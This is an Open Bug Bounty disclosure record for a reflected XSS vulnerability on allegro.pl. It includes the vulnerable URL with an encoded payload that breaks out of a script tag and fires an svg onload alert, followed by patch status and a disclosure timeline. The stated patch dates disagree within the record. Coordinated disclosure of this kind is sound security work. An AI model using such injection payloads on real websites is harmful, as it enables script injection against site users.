allegro.pl XSS vulnerability

2017-09-14T11:15:00
ID OBB:295793
Type openbugbounty
Reporter amlnspqr
Modified 2017-10-15T03:41:00

Description

Vulnerable URL:
http://allegro.pl/listing/user/listing.php?us_id=1680&city;=%3C%2Fscript%3E%3Csvg%20onload=alert(/XSS/)%3E
Details:

Description| Value
---|---
Patched:| Yes, at 18.09.2017
Latest check for patch:| 18.09.2017 08:36 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 274
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 14 September, 2017 11:15 GMT
Generic security notifications sent to website owner| 14 September, 2017 11:17 GMT
Vulnerability details disclosed by researcher| 14 October, 2017 11:23 GMT
Vulnerability patched by the website owner| 15 October, 2017 03:41 GMT